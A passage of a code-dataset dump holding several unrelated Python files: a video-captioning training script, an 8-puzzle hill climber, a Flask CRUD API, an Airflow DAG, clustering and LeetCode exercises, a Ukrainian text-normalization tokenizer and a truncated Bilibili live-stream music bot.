hidden\n\n\tdef init_hidden(self,batch_size):\n\t\treturn Variable(torch.zeros(1,batch_size,self.hidden_size).cuda()),Variable(torch.zeros(1,batch_size,self.hidden_size).cuda())\n\n\n### Training Stage ###\n\nV = Vocab(LABEL_PATH)\nITER = 2\nDS = TA_Dataset(DATA_DIR,LABEL_PATH)\nDL = DataLoader(DS,batch_size = 16)\nprint(\"Finish building dataloader\")\nE = Encoder(4096, hidden_size, 1).cuda()\nD = Decoder(2*hidden_size, hidden_size, 1).cuda()\ncriterion = nn.NLLLoss().cuda()\ne_optim = optim.Adam(E.parameters(), lr=1e-3)\nd_optim = optim.Adam(D.parameters(), lr=1e-3)\nSS_RATIO = 0.6\n\ndirectory = os.path.join(SAVE_DIR, 'S2VT_EnDe', '{}-{}'.format(hidden_size,postfix))\nif not os.path.exists(directory):\n os.makedirs(directory)\n\nSAVE = 1\t \nfor epoch in range(1,ITER):\n\ttotal_loss = 0\n\tfor data,caption_index in DL:\n\t\te_optim.zero_grad()\n\t\td_optim.zero_grad()\n\t\n\t\tfeat = Variable(data.view(data.size()[0], 80, -1))\n\t\ttarget = Variable(caption_index)\n\t\t## stage 1 ##\n\n\t\tdecoder_padding = Variable(torch.zeros(data.size()[0],80,hidden_size).cuda())\n\t\tencoder_hidden = E.init_hidden(data.size()[0])\n\t\tdecoder_hidden = D.init_hidden(data.size()[0])\n\t\t\n\t\tencoder_output1, encoder_hidden = E(feat, encoder_hidden)\n\t\tdecoder_result, decoder_output1, decoder_hidden = D(torch.cat((decoder_padding,encoder_output1),2),decoder_hidden)\n\t\n\t\tembed = Variable(torch.zeros(data.size()[0],1,hidden_size).cuda())\n\t\t## stage 2 ##\n\t\tloss = 0\n\t\tencoder_padding = Variable(torch.zeros(data.size()[0],1,4096).cuda())\n\t\tfor i in range(caption_index.size()[1]):\n\t\t\tencoder_output2, encoder_hidden = E(encoder_padding,encoder_hidden)\n\t\t\tdecoder_result2, embed, decoder_hidden = D(torch.cat((embed,encoder_output2),2),decoder_hidden)\n\t\t\tif random.uniform(0,1) < SS_RATIO:\n\t\t\t\tembed = 
D.embedding(target[:,i]).view(-1,1,hidden_size)\n\t\t\tloss += criterion(decoder_result2,target[:,i])\t\n\n\t\ttotal_loss += loss.data[0]\n\t\tloss.backward()\n\t\n\t\ttorch.nn.utils.clip_grad_norm(E.parameters(), 0.25)\n\t\ttorch.nn.utils.clip_grad_norm(D.parameters(), 0.25)\n\t\n\t\te_optim.step()\n\t\td_optim.step()\n\tprint('Epoch {} Loss: {}'.format(epoch, total_loss/len(DS)))\n\tif epoch%SAVE == 0:\n\t\ttorch.save({'encoder': E.state_dict(),'decoder': D.state_dict(), 'loss': total_loss/len(DS)}, os.path.join(directory, '{}.tar'.format(epoch)))\nprint(\"Finish training\")\n### Testing Stage ###\nBATCH_SIZE = 1\nTS = Testset(TEST_DIR,ID_PATH)\nCHECK_PATH = './save/S2VT_EnDe/{}-{}/{}.tar'.format(hidden_size,postfix,1)\ncheckpoint = torch.load(CHECK_PATH)\nE = Encoder(4096,hidden_size)\nE.load_state_dict(checkpoint['encoder'])\nD = Decoder(2*hidden_size,hidden_size)\nD.load_state_dict(checkpoint['decoder'])\nE = E.cuda()\nD = D.cuda()\nE.eval()\nD.eval()\nMAX_LENGTH = 50\n\ndef output_sen(index_list,V):\n\toutput = \"\"\n\tfor i in index_list:\n\t\tif i == EOS_TOKEN:\n\t\t\t#output += \" .\"\n\t\t\tbreak\n\t\telif i == BOS_TOKEN or i == PAD_TOKEN:\n\t\t\tcontinue\n\t\telse:\n\t\t\toutput += V.index2word[i]+\" \"\n\treturn output\t\n\nwith open(sys.argv[2],'w') as f:\n\tfor data in TS:\n\t\tcaption_id = data[1]\n\t\tdata = data[0]\n\t\tfeat = Variable(torch.from_numpy(data).view(1,-1,4096).float()).cuda()\n\t\tencoder_hidden = E.init_hidden(1)\n\t\tdecoder_hidden = D.init_hidden(1)\n\t\tdecoder_padding = Variable(torch.zeros(1,feat.size()[1],hidden_size).cuda())\n\t\tencoder_output1, encoder_hidden = E(feat,encoder_hidden)\n\t\tdecoder_result1, decoder_output1, decoder_hidden = D(torch.cat((decoder_padding,encoder_output1),2),decoder_hidden)\n\t\t\n\t\tembed = torch.zeros(1,1,hidden_size).cuda()\n\t\tembed = Variable(embed)\n\t\t\t\n\t\tencoder_padding = Variable(torch.zeros(1,1,4096).cuda())\n\t\tresult = []\n\t\tfor i in range(MAX_LENGTH):\n\t\t\tencoder_output2, encoder_hidden = E(encoder_padding, encoder_hidden)\n\t\t\tdecoder_result2, embed, decoder_hidden = D(torch.cat((embed,encoder_output2),2),decoder_hidden)\n\t\t\tresult.append(torch.max(decoder_result2,1)[1].data[0])\n\t\t'''\n\t\t### Beam Search ###\n\t\tbeam_size = 3\n\t\tmax_length = 20\n\t\tdef check_all_done(seqs):\n\t\t\tfor seq in seqs:\n\t\t\t\tif not seq:\n\t\t\t\t\treturn False\n\t\t\treturn True\n\n\t\tdef decode_step(seq):\n\t\t\te_p = encoder_padding\n\t\t\te_h = encoder_hidden\n\t\t\tem = embed\n\t\t\td_h = decoder_hidden\n\t\t\tif len(seq) == 1:\n\t\t\t\tencoder_output2,e_h = E(e_p, e_h)\n\t\t\t\td_r2, em, d_h = D(torch.cat((em,encoder_output2),2),d_h)\n\t\t\telse:\n\t\t\t\tfor i in range(1,len(seq)):\n\t\t\t\t\tindex = Variable(torch.LongTensor(seq[i][0]).cuda())\n\t\t\t\t\tencoder_output2,e_h = E(e_p, e_h)\n\t\t\t\t\td_r2, em, d_h = D(torch.cat((em,encoder_output2),2),d_h)\n\t\t\t\t\tem = D.embedding(index).view(-1,1,hidden_size)\n\t\t\tresult_prob = d_r2.data[0]\n\t\t\tprob = []\n\t\t\tprob = [(idx,p) for idx,p in enumerate(result_prob)]\n\t\t\tprob = sorted(prob,key = lambda x: x[1], reverse = True)\n\t\t\treturn prob\n\n\t\tdef beam_search_step(top_seqs,k):\n\t\t\tall_seqs = []\n\t\t\tfor seq in top_seqs:\n\t\t\t\tseq_score = sum([s for _,s in seq])\n\t\t\t\tif seq[-1][0] == EOS_TOKEN:\n\t\t\t\t\tall_seqs.append((seq,seq_score,True))\n\t\t\t\t\tcontinue\n\t\t\t\tcurrent_step = decode_step(seq)\n\t\t\t\tfor i, word in enumerate(current_step):\n\t\t\t\t\tif i >= k:\n\t\t\t\t\t\tbreak\n\t\t\t\t\tword_index = 
word[0]\n\t\t\t\t\tword_score = word[1]\n\t\t\t\t\tscore = seq_score + word_score\n\t\t\t\t\trs_seq = seq + [word]\n\t\t\t\t\tdone = (word_index == EOS_TOKEN)\n\t\t\t\t\tall_seqs.append((rs_seq,score,done))\n\t\t\tall_seqs = sorted(all_seqs, key = lambda x: x[1], reverse = True)\n\t\t\ttopk_seqs = [seq for seq,_,_ in all_seqs[:k]]\n\t\t\tcheck = [done for _,_,done in all_seqs[:k]]\n\t\t\tall_done = check_all_done(check)\n\t\t\treturn topk_seqs, all_done\n\n\t\ttop_seqs = [[(BOS_TOKEN,0)]]\n\t\tfor i in range(max_length):\n\t\t\ttop_seqs, all_done = beam_search_step(top_seqs,beam_size)\n\t\t\tif all_done:\n\t\t\t\tbreak\n\t\tprint(top_seqs)\n\t '''\t\n\t\tf.write('{},{}\\n'.format(caption_id,output_sen(result,V)))\n","repo_name":"camel8899/MLDS","sub_path":"hw2/model_integrate.py","file_name":"model_integrate.py","file_ext":"py","file_size_in_byte":9710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16294894887","text":" # -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Aug 28 23:03:11 2021\r\n\r\n@author: abhis\r\n\"\"\"\r\n\r\nfrom tile import Tiles\r\nfrom time import time\r\nimport random\r\n\r\nclass Hill_Climbing:\r\n def __init__(self,initial,goal):\r\n self.initial_state=initial\r\n self.goal_state=goal\r\n \r\n print(\"Start State: \")\r\n print(self.initial_state[0:3])\r\n print(self.initial_state[3:6])\r\n print(self.initial_state[6:9])\r\n \r\n print(\"Goal State: \")\r\n print(self.goal_state[0:3])\r\n print(self.goal_state[3:6])\r\n print(self.goal_state[6:9]) \r\n print()\r\n def solve(self,type_algo,heuristic):\r\n curr_state=Tiles(self.initial_state,None,self.goal_state,0,None,0,heuristic)\r\n goal_found=False\r\n path=[]\r\n path.append(curr_state.move)\r\n while goal_found==False:\r\n successors=curr_state.successors_curr_state() \r\n \r\n if type_algo==\"greedy\":\r\n curr_state=self.greedy(curr_state,successors) \r\n elif type_algo==\"first\":\r\n curr_state=self.first_succ(curr_state,successors) \r\n elif type_algo==\"stochastic\":\r\n curr_state=curr_state=self.stochastic_random_walk(curr_state,successors) \r\n \r\n if curr_state.path_cost\",end=\" \")\r\n print(\"Optimal Path Cost: \",curr_state.path_cost) \r\n print(\"Total No of States checked are: \",Tiles.state_count)\r\n print(\"Total No of States to optimal path: \",curr_state.path_cost+1) \r\n else:\r\n print(\"Goal not found\")\r\n print(\"Total number of states explored before termination are \",Tiles.state_count)\r\n def greedy(self,curr_state,successors):\r\n best_successor=curr_state \r\n \r\n for succ in successors: \r\n if succ.hvalue < curr_state.hvalue:\r\n best_successor=succ \r\n return best_successor\r\n \r\n def first_succ(self,curr_state,successors):\r\n \r\n for succ in successors: \r\n if succ.hvalue < curr_state.hvalue:\r\n return succ \r\n return curr_state\r\n \r\n def stochastic_random_walk(self,curr_state,successors):\r\n good_successors=[]\r\n best_hvalue=curr_state.hvalue\r\n for succ in successors:\r\n if succ.hvalue0:\r\n random_succ = random.choice(good_successors) \r\n return random_succ\r\n else:\r\n return curr_state\r\n \r\ndef main():\r\n with open(\"input.txt\", \"r\") as f: \r\n \t\r\n data=f.read().split(\"\\n\\n\\n\")\r\n inp,goal = data[0],data[1]\r\n initial=[int(y) for x in inp.split(\"\\n\") for y in x.split(\",\")]\r\n goal=[int(y) for x in goal.split(\"\\n\") for y in x.split(\",\")]\r\n \r\n t0=time()\r\n hill=Hill_Climbing(initial,goal)\r\n hill.solve(\"first\",\"h3\")\r\n t1=time()-t0\r\n \r\n 
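The beam search commented out at the end of model_integrate.py above ranks partial sequences by summed log-probability and stops once every surviving beam has emitted EOS. A minimal self-contained sketch of that control flow, where decode_step is a hypothetical stand-in for the encoder/decoder call:

# Standalone beam-search sketch. decode_step is a stand-in (assumption) for
# the model call in model_integrate.py; it returns (token, logprob) pairs
# sorted best-first. Log-probabilities make sequence scores additive.
EOS = 2

def decode_step(seq):
    return sorted({1: -0.5, 3: -1.0, EOS: -0.7}.items(),
                  key=lambda kv: kv[1], reverse=True)

def beam_search(k=2, max_len=5):
    beams = [([1], 0.0, False)]                     # (sequence, score, done)
    for _ in range(max_len):
        candidates = []
        for seq, score, done in beams:
            if done:                                # finished beams carry over
                candidates.append((seq, score, True))
                continue
            for tok, logp in decode_step(seq)[:k]:  # expand top-k children
                candidates.append((seq + [tok], score + logp, tok == EOS))
        beams = sorted(candidates, key=lambda c: c[1], reverse=True)[:k]
        if all(done for _, _, done in beams):       # every beam ended in EOS
            break
    return [(seq, round(score, 2)) for seq, score, _ in beams]

print(beam_search())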
print(\"time taken by Hill Climbing is\",t1)\r\nif __name__==\"__main__\":\r\n main()\r\n ","repo_name":"abhi5hekjangid/8-Puzzle-","sub_path":"hillclimbing.py","file_name":"hillclimbing.py","file_ext":"py","file_size_in_byte":3795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16504504885","text":"from flask import Flask, request, jsonify, make_response\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom marshmallow_sqlalchemy import ModelSchema\r\nfrom marshmallow import fields\r\n\r\napp = Flask(__name__)\r\napp.config['SQLALCHEMY_DATABASE_URI']='postgresql://postgres:asad1234@127.0.0.1:5432/postgres'\r\ndb = SQLAlchemy(app)\r\n\r\n\r\n@app.route('/')\r\ndef start():\r\n return \"Welcome to my page\"\r\n\r\nclass Info(db.Model):\r\n __tablename__=\"info\"\r\n id = db.Column(db.Integer, primary_key=True)\r\n name = db.Column(db.String(40))\r\n address = db.Column(db.String(40))\r\n age = db.Column(db.Integer)\r\n phone = db.Column(db.Integer)\r\n\r\n def create(self):\r\n db.session.add(self) \r\n db.session.commit() #adding data to database\r\n return self\r\n \r\n def __init__(self, name, address, age, phone):\r\n self.name = name\r\n self.address = address\r\n self.age = age\r\n self.phone = phone\r\n \r\n def __repr__(self):\r\n return '' % self.id\r\n\r\ndb.create_all() ##to create table\r\n\r\nclass InfoSchema(ModelSchema):\r\n class Meta(ModelSchema.Meta):\r\n model = Info\r\n sqla_session = db.session\r\n id = fields.Number(dump_only=True)\r\n name = fields.String(required=True)\r\n address = fields.String(required=True)\r\n age = fields.Number(required=True)\r\n phone = fields.Number(required=True) \r\n\r\n#DESIGNING ENDPOINTS FOR CRUD\r\n#GET Operation\r\n\r\n@app.route('/Info', methods=['GET'])\r\ndef index():\r\n get_info = Info.query.all() #in form of list \r\n Info_schema = InfoSchema(many=True) #json to object viveversa\r\n info = Info_schema.dump(get_info)\r\n return make_response(jsonify({ \"info\":info}))\r\n\r\n\r\n#POST Operation\r\n\r\n@app.route('/Info', methods = ['POST'])\r\ndef create_info():\r\n data = request.get_json()\r\n Info_schema = InfoSchema()\r\n info = Info_schema.load(data) ##json to object\r\n result = Info_schema.dump(info.create())\r\n return make_response(jsonify({\"info\": result}),200)\r\n\r\n#UPDATE Operation\r\n\r\n@app.route('/Info/', methods = ['PUT'])\r\ndef update_Info_by_id(id):\r\n data = request.get_json()\r\n get_info = Info.query.get(id)\r\n if data.get('name'):\r\n get_info.name = data['name']\r\n if data.get('address'):\r\n get_info.address = data['address']\r\n if data.get('age'):\r\n get_info.age = data['age']\r\n if data.get('phone'):\r\n get_info.phone= data['phone'] \r\n db.session.add(get_info)\r\n db.session.commit()\r\n Info_schema = InfoSchema()\r\n infos = Info_schema.dump(get_info)\r\n return make_response(jsonify({\"info\": infos}))\r\n\r\n#DELETE Operation\r\n\r\n@app.route('/Info/', methods = ['DELETE'])\r\ndef delete_Info_by_id(id):\r\n get_info = Info.query.get(id)\r\n db.session.delete(get_info)\r\n db.session.commit()\r\n return make_response(\"\",204)\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True, port=3000)\r\n","repo_name":"dpka09/FuseMachinesInternship","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26814589024","text":"from datetime import datetime\n\nfrom sql.exts import db\n\n\nclass 
UserModel(db.Model):\n __tablename__ = \"user\"\n userid = db.Column(db.Integer, primary_key=True, autoincrement=True, comment=\"自增id\")\n username = db.Column(db.String(50), nullable=False, comment=\"用户名\")\n password = db.Column(db.String(256), nullable=False, comment=\"密码\")\n nickname = db.Column(db.String(50), nullable=False, comment=\"用户昵称\")\n sex = db.Column(db.String(20), nullable=False, comment=\"性别\")\n height = db.Column(db.Integer, nullable=False, comment=\"身高\")\n weight = db.Column(db.Integer, nullable=False, comment=\"体重\")\n\n def save_to_db(self):\n db.session.add(self)\n db.session.commit()\n\n @classmethod\n def find_by_username(cls, username):\n return cls.query.filter_by(username=username).first()\n\n @classmethod\n def query_all_user(cls):\n return cls.query.all()\n\n\nclass HistoryModel(db.Model):\n __tablename__ = \"sport_history\"\n num = db.Column(db.Integer, primary_key=True, autoincrement=True, comment=\"自增序号\")\n username = db.Column(db.String(50), nullable=False, comment=\"用户名\")\n sport_name = db.Column(db.String(50), nullable=False, comment=\"运动名称\")\n count = db.Column(db.Integer, nullable=False, comment=\"运动计数\")\n sport_time = db.Column(db.Integer, nullable=False, comment=\"运动时间(秒)\")\n start_time = db.Column(db.DateTime, nullable=False, comment=\"运动开始时间\")\n\n def save_to_db(self):\n db.session.add(self)\n db.session.commit()\n\n @classmethod\n def query_all_by_username(cls, username):\n return cls.query.filter_by(username=username).all()\n\n @classmethod\n def query_select(cls, username, sport_name, start_time):\n if sport_name is not None and start_time is not None:\n return cls.query.filter(cls.username == username, cls.sport_name == sport_name,\n db.cast(cls.start_time, db.DATE) == db.cast(start_time, db.DATE)).all()\n elif start_time is None:\n return cls.query.filter_by(username=username, sport_name=sport_name).all()\n else:\n return cls.query.filter(cls.username == username,\n db.cast(cls.start_time, db.DATE) == db.cast(start_time, db.DATE)).all()\n","repo_name":"Creayhhh/LoopServer","sub_path":"sql/sql_models.py","file_name":"sql_models.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4279910269","text":"from datetime import datetime, timedelta\nfrom airflow import DAG\nfrom airflow.providers.docker.operators.docker import DockerOperator\nfrom airflow.utils.dates import days_ago\nfrom airflow.models import Variable\nfrom docker.types import Mount\nfrom omegaconf import OmegaConf\n\ncfg = OmegaConf.load(Variable.get('CONFIG_FILE_PATH'))\n\ndefault_args = {\n \"owner\": \"airflow\",\n \"depends_on_past\": False,\n \"email\": [\"yaapudyakov@edu.hse.ru\"],\n \"retries\": 1,\n \"retry_delay\": timedelta(minutes=5),\n}\n\nbatch_size = cfg['data']['batch_size']\nraw_data_path = cfg['paths']['raw_data_path']\nraw_target_path = cfg['paths']['raw_target_path']\nsource_data_dir = cfg['paths']['source_data_dir']\ntarget_data_dir = cfg['paths']['target_data_dir']\n\nwith DAG(\n dag_id=\"generate_data_batch\",\n start_date=datetime.today(),\n schedule_interval=\"@daily\",\n) as dag:\n\n generate_data = DockerOperator(\n image=\"generate-data\",\n command=f\"--k {batch_size} --save_data_path {raw_data_path} --save_target_path {raw_target_path} \" + \"--date {{ ds }}\",\n network_mode=\"bridge\",\n task_id=\"generate_data\",\n do_xcom_push=False,\n mount_tmp_dir=False,\n mounts=[Mount(source=source_data_dir, target=target_data_dir, type='bind')]\n 
)\n","repo_name":"made-mlops-2022/pudyakov_yaroslav_made","sub_path":"hw3/dags/data_generator.py","file_name":"data_generator.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25706351975","text":"import sys, time, os\n\ntop = os.path.abspath(os.path.join(os.path.dirname(sys.argv[0]), '..', '..'))\nos.putenv('SC_NODE_PATH', os.path.join(top, 'src', 'test', 'nodes'))\nsys.path.append(os.path.join(top, 'src', 'python'))\nimport solar_capture as sc\n\n\nargs = sys.argv[1:]\nassert len(args) >= 1\ncores = [int(a) for a in args]\nn_hops = len(cores)\n\nscs = sc.new_session()\n\nc2t = dict([(c, scs.new_thread(attr=dict(affinity_core=c))) \\\n for c in set(cores)])\nthrds = [c2t[c] for c in cores]\n\nthrd = thrds[0]\nsct_sender = thrd.new_node('sct_sender', args=dict(n=1))\npipeline = sct_sender\n\nrepeater = thrd.new_node('sc_repeater')\npipeline = sc.connect(pipeline, repeater)\n\nif n_hops > 1:\n thrd = thrds[1]\nmipg = thrd.new_node('sct_measure_ipg', args=dict(exit=1, iter=10000000))\npipeline = sc.connect(pipeline, mipg)\n\nfor i in range(n_hops - 2):\n touch = thrds[i+2].new_node('sct_touch')\n pipeline = sc.connect(pipeline, touch)\n\nsc.connect(pipeline, repeater, 'recycle')\n\nscs.go()\nwhile True:\n time.sleep(10000)\n","repo_name":"Xilinx-CNS/solarcapture","sub_path":"src/test/internal_loop.py","file_name":"internal_loop.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"16011194035","text":"# uncompyle6 version 3.2.3\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 2.7.5 (default, Jul 13 2018, 13:06:57) \n# [GCC 4.8.5 20150623 (Red Hat 4.8.5-28)]\n# Embedded file name: ./monitor/migrations/0020_database_is_switch_off.py\n# Compiled at: 2018-08-23 19:33:14\n# Size of source mod 2**32: 387 bytes\nfrom django.db import migrations, models\n\nclass Migration(migrations.Migration):\n dependencies = [\n ('monitor', '0019_db_schema')]\n operations = [\n migrations.AddField(model_name='database',\n name='is_switch_off',\n field=models.BooleanField(default=False))]\n# okay decompiling ./restful/hawkeye/monitor/migrations/0020_database_is_switch_off.pyc\n","repo_name":"zsprn123/yunqu","sub_path":"restful/hawkeye/monitor/migrations/0020_database_is_switch_off.py","file_name":"0020_database_is_switch_off.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33136263876","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport sys \nfrom sklearn.cluster import KMeans\n\ndataset = pd.read_csv('data/Iris.csv')\nx = dataset.iloc[:, [1, 2, 5]].values\n\nfor i in range(len(x)):\n if x[i][2] == 'Iris-setosa': x[i][2] = 0\n elif x[i][2] == 'Iris-versicolor': x[i][2] = 1\n elif x[i][2] == 'Iris-virginica': x[i][2] = 2\n\n\nplt.scatter(x[:, 0], x[:, 1], s = 50, c = x[:,2])\nplt.xlabel('SepalLengthCm')\nplt.ylabel('SepalWidthCm')\nplt.legend()\nplt.show()\n\nx = dataset.iloc[:, [1, 2]].values\n\nkmeans = KMeans(n_clusters=3, init='random', n_init=2, max_iter=3, precompute_distances='auto', verbose=0, random_state=None, copy_x=True, n_jobs=None, algorithm='auto')\ny_kmeans = kmeans.fit_predict(x)\n\nplt.scatter(x[y_kmeans == 0, 0], x[y_kmeans == 0, 1], s = 50, c = 'red', label = 'Iris-setosa')\nplt.scatter(x[y_kmeans == 1, 0], x[y_kmeans == 1, 1], s = 50, c = 
'blue', label = 'Iris-versicolour')\nplt.scatter(x[y_kmeans == 2, 0], x[y_kmeans == 2, 1],\n s=50, c='green', label='Iris-virginica')\nplt.scatter(kmeans.cluster_centers_[:, 0], kmeans.cluster_centers_[:,1], s = 100, c = 'black',marker = 'x', label = 'Centroids')\nplt.xlabel('SepalLengthCm')\nplt.ylabel('SepalWidthCm')\nplt.legend()\nplt.show()\n","repo_name":"pavels-k/My-algorithms","sub_path":"Machine_learning/kmeans++.py","file_name":"kmeans++.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34798783412","text":"\ndef subset(nums):\n output=[]\n def helper(start,temp,output):\n output+=[temp]\n for i in range(start,len(nums)):\n helper(i+1,temp+[nums[i]],output)\n helper(0,[],output)\n return output\n\n \n\n\n\n\n\nnums = [1,2]\n# nums=[1,2]\nprint(subset(nums))\n\n# Approch 2\n# def subset(nums):\n# output=[[]]\n# for i in nums:\n# for j in range(len(output)):\n# output.append([i]+[j])\n# print(output)\n\n# nums = [1,2,3]\n# subset(nums)\n\n# str=''\n# def subset(arr):\n \n# if len(arr)==1:\n# str+=str(arr)\n# else:\n# subset(arr[1:])\n# str+=str(arr)\n\n# print(str)\n\n\n\n\n# nums = [1,2,3,4,5,6]\n# subset(nums)\n# Output: [[],[1],[2],[1,2],[3],[1,3],[2,3],[1,2,3]]\n\n# out=[[],[1]]\n# for i in range(len(out)):\n# out.append(out[i]+[2])\n# print(out)\n# print(\"Amit\")\n","repo_name":"Amit151296/amitleetcode","sub_path":"myleetcode/subset.py","file_name":"subset.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41878255556","text":"\"\"\"\nGiven an unsorted array of integers nums, return the length of the longest consecutive elements sequence.\n\nYou must write an algorithm that runs in O(n) time.\n\n\n\nExample 1:\n\nInput: nums = [100,4,200,1,3,2]\nOutput: 4\nExplanation: The longest consecutive elements sequence is [1, 2, 3, 4]. 
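The commented-out "Approach 2" in subset.py above is buggy: output.append([i]+[j]) pairs the element with a loop index instead of extending each existing subset. The iterative power-set construction it was aiming for is a two-liner:

# Iterative power set: each new element spawns a copy of every existing
# subset, doubling the output per round (2**n subsets in total).
def subsets(nums):
    output = [[]]
    for n in nums:
        output += [cur + [n] for cur in output]
    return output

print(subsets([1, 2]))  # [[], [1], [2], [1, 2]]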
Therefore its length is 4.\n\nExample 2:\n\nInput: nums = [0,3,7,2,5,8,4,6,0,1]\nOutput: 9\n\n\nConstraints:\n\n0 <= nums.length <= 10^5\n-10^9 <= nums[i] <= 10^9\n\"\"\"\nfrom typing import List\n\n\nclass Solution1:\n def longestConsecutive(self, nums: List[int]) -> int:\n result = 0\n _set = set(nums)\n for num in nums:\n if num - 1 not in _set:\n end = num + 1\n while end in _set:\n end += 1\n result = max(result, end - num)\n return result\n\n\nclass Solution2:\n class UnionFind:\n def __init__(self, n):\n self.__parent = [i for i in range(n)]\n self.__rank = [0] * n\n\n def find(self, x):\n if x == self.__parent[x]:\n return x\n self.__parent[x] = self.find(self.__parent[x])\n return self.__parent[x]\n\n def union(self, x1, x2):\n root1, root2 = self.find(x1), self.find(x2)\n if self.__rank[root1] < self.__rank[root2]:\n self.__parent[root1] = self.__parent[root2]\n else:\n self.__parent[root2] = self.__parent[root1]\n if self.__rank[root1] == self.__rank[root2]:\n self.__rank[root2] += 1\n\n def max_size(self):\n result = 0\n n = len(self.__parent)\n size = [0] * n\n for i in range(n):\n root = self.find(i)\n size[root] += 1\n result = max(result, size[root])\n return result\n\n def longestConsecutive(self, nums: List[int]) -> int:\n n = len(nums)\n if n == 0:\n return 0\n _dict = {}\n uf = self.UnionFind(n)\n for i, num in enumerate(nums):\n if num in _dict:\n continue\n _dict[num] = i\n if num - 1 in _dict:\n uf.union(_dict[num - 1], i)\n if num + 1 in _dict:\n uf.union(_dict[num + 1], i)\n return uf.max_size()\n","repo_name":"qianbinbin/leetcode","sub_path":"python3/leetcodepy/longest_consecutive_sequence.py","file_name":"longest_consecutive_sequence.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"15480728550","text":"import pynini\nfrom pynini.lib import pynutil\n\nfrom ukr.graph_utils import delete_space, GraphFst, delete_extra_space\nfrom ukr.taggers.cardinal import CardinalFst\nfrom ukr.taggers.date import DateFst\nfrom ukr.taggers.decimal import DecimalFst\nfrom ukr.taggers.measure import MeasureFst\nfrom ukr.taggers.money import MoneyFst\nfrom ukr.taggers.ordinal import OrdinalFst\nfrom ukr.taggers.time import TimeFst\nfrom ukr.taggers.word import WordFst\n\n\nclass ClassifyFst(GraphFst):\n\n def __init__(self):\n super().__init__(name=\"tokenize_and_classify\", kind=\"classify\")\n\n cardinal = CardinalFst()\n cardinal_graph = cardinal.fst\n\n ordinal = OrdinalFst(cardinal)\n ordinal_graph = ordinal.fst\n\n decimal = DecimalFst(cardinal)\n decimal_graph = decimal.fst\n\n measure_graph = MeasureFst(cardinal=cardinal, decimal=decimal).fst\n date_graph = DateFst(cardinal=cardinal, ordinal=ordinal).fst\n time_graph = TimeFst(cardinal=cardinal, ordinal=ordinal).fst\n word_graph = WordFst().fst\n money_graph = MoneyFst(cardinal=cardinal, decimal=decimal).fst\n\n classify = (\n pynutil.add_weight(decimal_graph, 1.1)\n | pynutil.add_weight(measure_graph, 1.1)\n | pynutil.add_weight(cardinal_graph, 1.1)\n | pynutil.add_weight(ordinal_graph, 1.1)\n | pynutil.add_weight(money_graph, 1.1)\n | pynutil.add_weight(date_graph, 1.1)\n | pynutil.add_weight(time_graph, 1.1)\n | pynutil.add_weight(word_graph, 100)\n )\n\n token = pynutil.insert(\"tokens { \") + classify + pynutil.insert(\" }\")\n\n graph = token + pynini.closure(delete_extra_space + token)\n graph = delete_space + graph + delete_space\n\n self.fst = 
graph.optimize()\n","repo_name":"lociko/ukraine_itn_wfst","sub_path":"ukr/taggers/tokenize_and_classify.py","file_name":"tokenize_and_classify.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"33165375146","text":"import asyncio\nimport random\nimport time\nimport os\nimport logging\nfrom bilibili_api import live\nfrom threading import Thread, Lock\nimport time\n\nimport start\n\nstart.get_default_info()\n\nimport wordpicker\nimport utils\nimport globaler as gl\nimport ffmpeg_cmd\n\n\n\nroom = live.LiveDanmaku(room_display_id=gl.room_id)\nlock = Lock()\ntime_last_pop = time.time()\n\n#主播放循环\nasync def music_player():\n while True:\n try:\n code, selected_music = choose_music()\n _, duration = await ffmpeg_cmd.get_vidoe_info(selected_music)\n time_point1 = time.time()\n logging.info(\"playing \" + selected_music + \" music_duration: \" + str(duration) + \" second\")\n if not os.path.exists('./video/' + selected_music + '.flv'):\n logging.warning(\"No music:\" + selected_music)\n continue\n await begin_live(selected_music)\n time_point2 = time.time()\n real_duration = time_point2 - time_point1\n\n while real_duration < 0.9 * float(duration):\n try:\n time_point1 = time.time()\n await ffmpeg_cmd.push_stream(selected_music, real_duration)\n time_point2 = time.time()\n real_duration = real_duration + time_point2 - time_point1\n except:\n break\n \n logging.info(\"music real play time: \" + str(real_duration))\n if code:\n with lock:\n gl.called_list.pop(0)\n\n if code:\n utils.delete_music(selected_music)\n except Exception as e:\n logging.error(e)\n break\n\n#开播\nasync def begin_live(music_name):\n try:\n logging.info(\"live start\")\n await ffmpeg_cmd.start_live(music_name)\n except Exception as e:\n logging.error(e)\n\n\n#点歌循环\n@room.on('DANMU_MSG')\nasync def call_list(event):\n with lock:\n code, music_name, usr_info = await wordpicker.analysis_danmuku(event)\n if code == -1:\n return 0\n if gl.check_music_name(music_name):\n with lock:\n await wordpicker.double_music_fault(usr_info)\n gl.clean_fault_music(music_name)\n return 0\n with lock:\n gl.download_list.append(music_name)\n task = video_composer(music_name, 